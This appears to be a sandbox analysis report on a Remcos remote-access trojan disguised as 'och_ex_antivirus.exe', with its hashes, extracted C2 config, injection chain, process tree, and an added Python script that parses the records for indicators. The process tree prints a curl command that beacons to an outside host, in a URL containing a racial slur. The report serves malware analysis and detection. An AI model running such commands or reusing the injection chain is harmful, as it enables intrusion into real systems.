Analysis
max time kernel: 141s
max time network: 139s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-04-2024 11:57
Static task: static1
Behavioral task: behavioral1
  Sample: och_ex_antivirus.exe
  Resource: win7-20240221-en
Behavioral task: behavioral2
  Sample: och_ex_antivirus.exe
  Resource: win10v2004-20240412-en
General
Target: och_ex_antivirus.exe
Size: 17.0MB
MD5: eb33ab953cc1efc9a57c6c9db447a587
SHA1: e5657e79caa5722ac87a0b933f9a22d4b4844f71
SHA256: 042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff
SHA512: 69b6ed09d38a85bef70ff52e7833d060163c0b6bddd271d81f801a99513da2985d5d25dcb971b57b00504053b93068e5921142abb13ed05c33e1e1d5c4841c78
SSDEEP: 196608:C0bq45mXYPrOLaw1ZiRaKUhi9TQvtzEXPg7V8/TLZ5:/bq4oojOLahUhi9z/PTLr
Malware Config
Extracted: remcos
RemoteHost: 178.33.57.155:443
audio_folder: MicRecords
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: false
install_flag: false
keylog_crypt: false
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-PM1AI7
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
Processes: WScript.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation (WScript.exe)
Executes dropped EXE (2 IoCs)
Processes: ptSrv.exe, ptSrv.exe
  PID 3948 ptSrv.exe
  PID 1856 ptSrv.exe
Loads dropped DLL (12 IoCs)
Processes: ptSrv.exe, ptSrv.exe
  PID 3948 ptSrv.exe (6 DLL loads)
  PID 1856 ptSrv.exe (6 DLL loads)
Checks whether UAC is enabled (1 IoC)
Processes: och_ex_antivirus.exe
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (och_ex_antivirus.exe)
Drops file in System32 directory (1 IoC)
Processes: explorer.exe
  File opened for modification: C:\Windows\SysWOW64\explorer.exe (explorer.exe)
Suspicious use of SetThreadContext (1 IoC)
Processes: ptSrv.exe
  PID 1856 (ptSrv.exe) set thread context of PID 956 (cmd.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Modifies Internet Explorer settings (4 IoCs)
Processes: ptSrv.exe, ptSrv.exe
  Key created: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl (ptSrv.exe)
  Key created: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (ptSrv.exe)
  Key created: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl (ptSrv.exe)
  Key created: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION (ptSrv.exe)
Modifies registry class (1 IoC)
Processes: explorer.exe
  Key created: \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings (explorer.exe)
Suspicious behavior: EnumeratesProcesses (7 IoCs)
Processes: och_ex_antivirus.exe, ptSrv.exe, ptSrv.exe, cmd.exe
  PID 3232 och_ex_antivirus.exe (2 events)
  PID 3948 ptSrv.exe (1 event)
  PID 1856 ptSrv.exe (2 events)
  PID 956 cmd.exe (2 events)
Suspicious behavior: MapViewOfSection (2 IoCs)
Processes: ptSrv.exe, cmd.exe
  PID 1856 ptSrv.exe
  PID 956 cmd.exe
Suspicious use of AdjustPrivilegeToken (4 IoCs)
Processes: ptSrv.exe, ptSrv.exe
  Token: SeTakeOwnershipPrivilege, PID 3948 ptSrv.exe (2 events)
  Token: SeTakeOwnershipPrivilege, PID 1856 ptSrv.exe (2 events)
Suspicious use of WriteProcessMemory (27 IoCs)
Processes: och_ex_antivirus.exe, ptSrv.exe, ptSrv.exe, cmd.exe, explorer.exe, WScript.exe, cmd.exe
  writer PID / process       -> target PID / process   writes
  3232 och_ex_antivirus.exe  -> 3948 ptSrv.exe         3
  3948 ptSrv.exe             -> 1856 ptSrv.exe         3
  1856 ptSrv.exe             ->  956 cmd.exe           4
   956 cmd.exe               -> 1084 explorer.exe      5
  1084 explorer.exe          -> 2472 WScript.exe       3
  2472 WScript.exe           -> 4980 cmd.exe           3
  4980 cmd.exe               -> 1500 curl.exe          3
  1084 explorer.exe          -> 4660 WScript.exe       3
Processes (indented by depth in the process tree)
C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe  PID 3232
  command line: "C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"
  - Checks whether UAC is enabled
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe  PID 3948
    command line: C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
    - Executes dropped EXE
    - Loads dropped DLL
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe  PID 1856
      command line: C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of SetThreadContext
      - Modifies Internet Explorer settings
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      C:\Windows\SysWOW64\cmd.exe  PID 956
        command line: C:\Windows\SysWOW64\cmd.exe
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious behavior: MapViewOfSection
        - Suspicious use of WriteProcessMemory
        C:\Windows\SysWOW64\explorer.exe  PID 1084
          command line: C:\Windows\SysWOW64\explorer.exe
          - Drops file in System32 directory
          - Modifies registry class
          - Suspicious use of WriteProcessMemory
          C:\Windows\SysWOW64\WScript.exe  PID 2472
            command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"
            - Checks computer location settings
            - Suspicious use of WriteProcessMemory
            C:\Windows\SysWOW64\cmd.exe  PID 4980
              command line: "C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
              - Suspicious use of WriteProcessMemory
              C:\Windows\SysWOW64\curl.exe  PID 1500
                command line: curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO
          C:\Windows\SysWOW64\WScript.exe  PID 4660
            command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upeegjbouopehpnbxkclalylbt.vbs"

Notes on the tree: the executables resolve under C:\Windows\SysWOW64\ even though the command lines name C:\Windows\System32\, which is WoW64 file-system redirection for a 32-bit process chain on x64 Windows. ptSrv.exe (PID 1856) is the only process that both writes into a child (cmd.exe, PID 956) and calls SetThreadContext on it, the usual pair of operations for injection into a freshly created, argument-less system binary; cmd.exe then launches explorer.exe with no arguments, which in turn spawns the WScript.exe stages. The curl beacon target 94.156.66.107:9000 is a different host from the Remcos RemoteHost 178.33.57.155:443 extracted from the config, so both belong in any indicator list derived from this run, and the id=QUBJEIMO query value is per-sample and should not be used as a detection key on its own.
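As an added example (not part of this report or the sandbox vendor's tooling), the following Python rebuilds the process chain from the "wrote to memory" and "set thread context" records above, flags the ptSrv.exe to cmd.exe injection, and collects the network indicators. The log lines are constructed from this report with repeated records collapsed and the beacon URL path elided; the function and constant names are the example's own.

```python
"""Rebuild the process chain from sandbox WriteProcessMemory / SetThreadContext
records, flag the injection step, and pull network indicators.
Added example: input lines are constructed from the report, repeats collapsed."""
import re

# Constructed from the report's "Suspicious use of WriteProcessMemory" section
# (one line per distinct writer -> target pair; the report repeats each several times).
WPM_LOG = """\
PID 3232 wrote to memory of 3948 3232 och_ex_antivirus.exe ptSrv.exe
PID 3948 wrote to memory of 1856 3948 ptSrv.exe ptSrv.exe
PID 1856 wrote to memory of 956 1856 ptSrv.exe cmd.exe
PID 956 wrote to memory of 1084 956 cmd.exe explorer.exe
PID 1084 wrote to memory of 2472 1084 explorer.exe WScript.exe
PID 2472 wrote to memory of 4980 2472 WScript.exe cmd.exe
PID 4980 wrote to memory of 1500 4980 cmd.exe curl.exe
PID 1084 wrote to memory of 4660 1084 explorer.exe WScript.exe
"""

# Constructed from the report's "Suspicious use of SetThreadContext" section.
STC_LOG = "PID 1856 set thread context of 956 1856 ptSrv.exe cmd.exe\n"

# Command line of the beacon process from the report (URL path elided here)
# and the RemoteHost value from the extracted Remcos config.
CMDLINES = {1500: "curl http://94.156.66.107:9000/hooks/..."}
REMCOS_REMOTE_HOST = "178.33.57.155:443"

# Both record types share the layout: PID <src> <op> <dst> <src> <src_image> <dst_image>
EVENT_RE = re.compile(
    r"PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) "
    r"(?P<dst>\d+) (?P=src) (?P<src_img>\S+) (?P<dst_img>\S+)$"
)


def parse_events(log):
    """Yield (op, src_pid, dst_pid, src_image, dst_image) for each well-formed record."""
    for line in log.splitlines():
        m = EVENT_RE.match(line.strip())
        if m:
            yield (m["op"], int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"])


def build_tree(wpm_log):
    """Map each written-to PID to the PID that wrote into it, plus PID -> image name.
    In this report the writer is always the creating parent, so the map doubles as
    the process tree (a parent writing into a new child is how the sandbox records
    both ordinary process start-up and injection)."""
    parent, image = {}, {}
    for _op, src, dst, src_img, dst_img in parse_events(wpm_log):
        parent[dst] = src
        image[src] = src_img
        image[dst] = dst_img
    return parent, image


def ancestry(parent, image, pid):
    """Return [(pid, image), ...] walking from pid up to the root of the tree."""
    chain = []
    while pid is not None:
        chain.append((pid, image[pid]))
        pid = parent.get(pid)
    return chain


def injection_targets(wpm_log, stc_log):
    """A process that both writes into another process and resets one of its thread
    contexts is the classic injection/hollowing pair; return the matching
    (injector_pid, injector_image, target_pid, target_image) tuples."""
    writers = {(src, dst) for _op, src, dst, *_ in parse_events(wpm_log)}
    return [
        (src, src_img, dst, dst_img)
        for _op, src, dst, src_img, dst_img in parse_events(stc_log)
        if (src, dst) in writers
    ]


# host[:port] of any http(s) URL appearing in a command line
HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+(?::\d+)?)")


def network_iocs(cmdlines, extra=()):
    """Collect host[:port] values from URLs in command lines, merged with hosts
    taken from elsewhere in the report (here the Remcos config)."""
    hosts = set(extra)
    for cl in cmdlines.values():
        hosts.update(HOST_RE.findall(cl))
    return sorted(hosts)


if __name__ == "__main__":
    parent, image = build_tree(WPM_LOG)
    print(" <- ".join(f"{p}:{i}" for p, i in ancestry(parent, image, 1500)))
    print(injection_targets(WPM_LOG, STC_LOG))
    print(network_iocs(CMDLINES, [REMCOS_REMOTE_HOST]))
```

Run as a script it prints the eight-process ancestry of the curl beacon (curl.exe back to och_ex_antivirus.exe), the single injector/target pair (1856 ptSrv.exe into 956 cmd.exe), and the two network hosts. The same parser accepts a full export of the records, so the counts a triage note would cite can be taken from the raw lines rather than the collapsed list used here.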
Network
MITRE ATT&CK Enterprise v15
Downloads (files dropped or extracted during the run; the report gives hashes only, no file names)
-
Filesize: 146B
MD5: 85a2ebad40c21ba1da77230265b5351f
SHA1: 803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256: b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512: 77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a
-
Filesize: 5.4MB
MD5: 47842103e2e4b1f02de9a4dea3b65dcc
SHA1: 11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA256: 0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA512: 18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322
-
Filesize: 1.2MB
MD5: 88a381396c6d9e97c422942355b39f5d
SHA1: d3e47ef8fa3191f3f4806a6051f2f4b7bbc667e1
SHA256: 367ecc25206001828a90b5d935a4cce9b90322d21fc9316a5c6dd431df8715c7
SHA512: 0545b57e97f1182da64ee4e12c8547979d0f6193c2b64a0d4d9f67e3797ec0d91a19218697bca1ea8b2b76c04ded1e798e5aa57f113beedb5e47b275362c990a
-
Filesize: 427KB
MD5: 71a0aa2d05e9174cefd568347bd9c70f
SHA1: cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256: fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512: 6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a
-
Filesize: 81KB
MD5: 16b26bc43943531d7d7e379632ed4e63
SHA1: 565287de39649e59e653a3612478c2186096d70a
SHA256: 346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512: b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc
-
Filesize: 590KB
MD5: b3e030ab715a02f8864a79f552a247b7
SHA1: 4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA256: 2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512: cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda
-
Filesize: 1.0MB
MD5: a0a180d2677f494049d7a55c888fed93
SHA1: d09358fddc9a67ae55b5ba4a34fba04357b528db
SHA256: 5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd
SHA512: 1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1
-
Filesize: 28KB
MD5: db3f3969e8a2f913fe3643d8465171b1
SHA1: 736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256: c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA512: 0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b
-
Filesize: 2.5MB
MD5: 2087eb2d3fb639933ebe0a0614fd5218
SHA1: c1a1b75c8e76e000b7045092bd11100904a72840
SHA256: 725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA512: 3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e
-
Filesize: 202KB
MD5: 64179e64675e822559cac6652298bdfc
SHA1: cceed3b2441146762512918af7bf7f89fb055583
SHA256: c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512: ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280
-
Filesize: 165KB
MD5: 3c3e960d59cb413791fee1e944b6df72
SHA1: 4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA256: 88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA512: 85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac
-
Filesize: 103KB
MD5: c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1: b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256: 9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512: 219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411
-
Filesize: 324B
MD5: 5969db124f530f24b0e1b305ca5a8291
SHA1: 5eb79a70cc356a20ba39913489a5cdca36f83011
SHA256: 3a4ae3a89b9c1d79fbef06dd969b1307837c0378966c5f7ceddafb1e4660a072
SHA512: 0297ea245560c1b5fe64f5a3cd7769ea4e9f09dfc4cc4f16c8d96c5b5d846c8982458991aa143ea5a103436a03c5e7d5b7769b2b87bca5565e856de960e2e290